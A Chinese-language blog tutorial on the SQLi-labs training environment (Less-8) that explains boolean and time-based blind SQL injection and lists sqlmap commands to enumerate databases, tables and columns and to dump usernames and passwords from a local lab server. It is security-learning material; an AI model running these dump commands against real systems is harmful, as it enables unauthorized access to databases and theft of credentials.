SQL labs-SQL注入(三,sqlmap使用)

本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。

引言:

盲注简述:是在没有回显得情况下采用的注入方式,分为布尔盲注和时间盲注。

布尔盲注:布尔仅有两种形式,ture(对),false(错)两种形式。

对,有回显;错,无回显。根据其性质,就可实现盲注。

时间盲注:在无任何回显所采用的形式,根据数据库响应时间来进行判断。例如:若输入值正确,页面一秒后响应;错误,页面三秒后响应。将其转化为布尔盲注来解决无回显,但如果数据库卡顿,则可能导致误判。

工具注入。

1,工具:sqlmap。

需要提前安装配置python环境,建议使用虚拟机安装的kali linux。自带多种语言环境以及渗透工具,便于使用,虚拟机以及kali安装,源文件可在官网查找,此处不做赘述。

复制代码
sqlmap -u http://172.168.10.129:8001/Less-8/?id=1 //-u 是指定url

2,检测注入点,得到了数据库版本,传参方式以及漏洞。3,查看所有数据库。

复制代码
sqlmap  -u http://192.168.239.1:8001/Less-8/?id=1 --dbs

4,查看当前使用的数据库。

复制代码
sqlmap -u http://192.168.239.1:8001/Less-8/?id=1 --current-db 

5,查看当前数据库内的表名。

复制代码
sqlmap -u http://192.168.239.1:8001/Less-8/?id=1 -D 'security' --tables

6,查看字段名。

复制代码
sqlmap -u http://192.168.239.1:8001/Less-8/?id=1 -D 'security' -T 'users' --columns

7,查看敏感数据。

复制代码
sqlmap -u http://192.168.239.1:8001/Less-8/?id=1 -D 'security' -T 'users' -C username,password --dump

8,查看当前数据库的所有用户。

复制代码
sqlmap -u http://192.168.239.1:8001/Less-8/?id=1 --users  

这是目前最常用的sql注入工具,具体用法参考这篇文章:SQLmap使用教程图文教程(超详细)-CSDN博客

10,后记。

sql注入漏洞是最基础的漏洞,sqlmap是网络安全维护必不可少的工具。但在学习前也应该先学习一定的诸如:url编码,常见进制转换,php语言以及sql数据库语言。

相关推荐
陈皮糖..1 小时前
27 届运维实习笔记|第三、四周:从流程熟练到故障排查,企业运维实战深化
运维·笔记·sql·nginx·ci/cd·云计算·jenkins
weixin_520649871 小时前
数据库函数
数据库
Bert.Cai2 小时前
MySQL LPAD()函数详解
数据库·mysql
OnlyEasyCode3 小时前
Navicat 任务自动备份指定数据库
数据库
if else3 小时前
Redis 哨兵集群部署方案
数据库·redis
yejqvow123 小时前
Pandas 高效实现组内跨行时间戳匹配与布尔标记
jvm·数据库·python
了不起的云计算V4 小时前
从DeepSeek V4适配看国产算力的三个拐点
数据库·人工智能
qq_189807034 小时前
html标签如何提升可访问性_aria-label与title区别【指南】
jvm·数据库·python
norq juox4 小时前
MySQL 导出数据
数据库·mysql·adb
qq_349317484 小时前
mysql如何设置定时自动备份脚本_编写shell脚本与cron任务
jvm·数据库·python